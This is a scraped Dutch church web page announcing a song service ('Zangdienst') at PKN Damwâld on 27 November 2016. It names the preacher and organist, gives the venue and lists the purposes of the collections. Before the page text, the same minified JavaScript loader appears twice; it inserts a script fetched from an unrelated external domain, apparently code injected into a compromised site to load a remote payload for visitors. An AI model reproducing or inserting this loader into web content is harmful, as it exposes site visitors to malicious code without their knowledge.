;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 27 november 2016 14:00 uur - PKN Damwâld
zondag 27 november 2016
14:00 uur

Kerkdienst zondag 27 november 2016 14:00 uur

Thema: Zangdienst !

De dienst van zondagmiddag 27 november zal het karakter hebben van een zangdienst. Dat betekent niet, dat we zomaar wat gaan zingen, maar wel, dat de boodschap meer zal zitten in de liederen dan in de preek. De dienst wordt voorbereid met de liturgiecommissie, en zal als thema hebben “Op weg naar de hemel”. Daar zijn heel wat liederen bij te vinden. In de oude bundel van Joh. de Heer vind je er heel wat, die uitzien naar een leven bij God – daar gaan we vast een aantal van gebruiken. Maar er is nog heel wat meer mooie muziek te vinden. Met de voorbereidingscommissie gaan we daar naar op zoek, in de hoop dat het een dienst wordt die onze gedachten trekt naar de heerlijkheid bij God. Misschien ervaren we al zingend hier op aarde al iets hemels!

vg_-01

Informatie

Voorganger:Ds. S. Boukes
Organist:Johanna van der Weide
Thema:Zangdienst !
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Eerste collecte: Diaconaal doel
Tweede collecte: Missionair werk en kerkgroei
Uitganscollecte: Onderhoud gebouwen